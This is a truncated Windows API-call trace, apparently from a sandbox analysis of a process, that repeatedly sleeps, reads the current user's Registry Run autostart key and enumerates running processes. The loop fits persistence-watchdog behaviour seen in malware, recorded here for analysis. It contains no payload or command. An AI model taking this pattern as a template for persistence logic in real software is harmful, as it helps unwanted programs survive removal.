0x0 [0180.028] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.040] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.040] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.040] NtClose (Handle=0x154) returned 0x0 [0180.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.045] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.056] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.056] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.056] NtClose (Handle=0x154) returned 0x0 [0180.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.062] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.071] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.072] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.072] NtClose (Handle=0x154) returned 0x0 [0180.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.076] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.087] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.087] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.087] NtClose (Handle=0x154) returned 0x0 [0180.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.093] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.102] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.103] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.103] NtClose (Handle=0x154) returned 0x0 [0180.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.107] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.118] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.118] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.118] NtClose (Handle=0x154) returned 0x0 [0180.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.122] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.135] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.136] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.136] NtClose (Handle=0x154) returned 0x0 [0180.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.140] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.149] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.149] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.149] NtClose (Handle=0x154) returned 0x0 [0180.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.153] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.166] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.166] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.166] NtClose (Handle=0x154) returned 0x0 [0180.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.170] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.180] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.181] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.181] NtClose (Handle=0x154) returned 0x0 [0180.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.185] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.196] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.196] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.196] NtClose (Handle=0x154) returned 0x0 [0180.196] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.201] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.224] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.224] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.224] NtClose (Handle=0x154) returned 0x0 [0180.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.229] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.243] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.243] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.243] NtClose (Handle=0x154) returned 0x0 [0180.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0180.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0180.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0180.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0180.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0180.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0180.247] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0180.260] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0180.260] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0180.260] NtClose (Handle=0x154) returned 0x0 [0180.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, 